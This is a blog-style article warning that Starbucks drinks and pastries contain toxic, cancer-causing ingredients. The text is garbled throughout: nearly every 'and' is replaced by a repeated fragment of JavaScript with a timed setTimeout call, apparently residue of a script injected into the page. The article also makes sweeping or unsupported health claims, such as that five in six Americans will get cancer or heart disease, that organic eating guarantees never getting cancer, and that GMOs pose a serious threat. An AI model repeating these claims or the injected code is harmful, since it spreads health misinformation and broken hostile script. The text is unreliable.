Starbucks coffeeStarbucks has become a household name andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and is daily habit that many Americans have become accustomed to. Since 5 out 6 Americans will be diagnosed with Cancer or Heart Disease in their lifetime, maybe we need to look at some of the habits we have that may be destroying our health.

Most of us have heard by now that fast food is harmful, but when it comes to coffee we seem to have a different set of health rules. It’s just coffee right? How can a liquid hurt your health? Well, I hate to be the bearer of bad news, but there are many chemicals in your Starbucks coffee that are destroying your health.

Here’s what you need to know about your Starbucks habit.

It’s not organic

Ok, so call me a zealot for wanting you all to eat organic. I think the quickest path to living in the body you have always dreamed of, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and assuring you NEVER get a cancer diagnosis, is to stop eating or drinking toxins.

Did you know that coffee is one of the most chemically treated crops in the world?

According to the CS Monitor, up to 250 pounds of chemical fertilizers are sprayed per acre of non-organic coffee. When you sip your conventional coffee, you are ingesting the pesticide residues, which contributes too many health problems including cancer andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and miscarriages in pregnant women.

Americans drink about 400 million cups of coffee every day, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and most of the coffee beans are imported. The U.S. Department of Agriculture actually has little control over the type andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and amount of pesticides used on imported coffee. The most effective way to protect against potential harm from the pesticides is to drink organic coffee.

The added chemicals

In most of the drinks at Starbucks there are added cancer causing chemicals; especially in the lattes andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and frappuccinos. Here are some of the chemicals you will find in your Starbucks drinks andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and pastry goods that are toxic:

Refined Flours – White flour that has been stripped of its nutrients (andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and sometimes bleached) andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and provides nothing but empty calories that contribute to chronic disease & obesity.

Chemically Derived Sugars – Some products like the lemon pound cake contain 6 different types of processed sugars (e.g. powdered sugar, glycose syrup, corn syrup, maltodextrin, dextrose, etc.).

Preservatives – The Mayo Clinic reported that the preservative sodium benzoate (an ingredient found in the Iced Lemon Pound Cake) may increase hyperactivity in children. Also, when sodium benzoate combines with ascorbic acid (vitamin C) benzene can form a carcinogen andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and kill DNA cells, accelerating aging.

Growth Hormone – Starbucks has eliminated growth hormone milk in their core dairy products, but not in their food products. That means you could be still be ingesting a substance that has been reported to cause breast, colon andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and prostate cancers.

Cellulose Gum – This a filler made from wood pulp your body can’t even digest.

Proplyene Glycol – This is an ingredient in the Apple Fritter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Reduced Fat Cinnamon Swirl Cake, which is derived from petroleum andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and a key chemical that can be found in anti-freeze.

Azodicarbonamide – This substance, found in Starbucks croissants, is banned in the U.K., Europe andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Australia, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and if used in Singapore can result in fines up to $450,000 andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and a 15 year prison sentence! This ingredient has been reported to cause asthmatic symptoms in people who inhale it andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and can also increase certain food sensitivities.

Genetically Modified Ingredients (GMOs) – Several of the listed ingredients are likely genetically modified. We’ll never know for sure how much of Starbucks products are genetically modified since they are currently not required to be labeled in this country. But we do know that the consumption of GMO foods poses a serious threat to our health andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and have been linked to toxicity, allergic reactions andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and fertility issues.

Cheap Oils –  Soy, canola or corn oil can be found in almost all of Starbucks’ products. Over-consumption of these cheap oils are causing an abundance of Omega 6 fatty acids in our diets. The imbalance of Omega 6 fatty acids increases the risk of inflammation, heart disease, obesity, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and prostate andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and bone cancer.
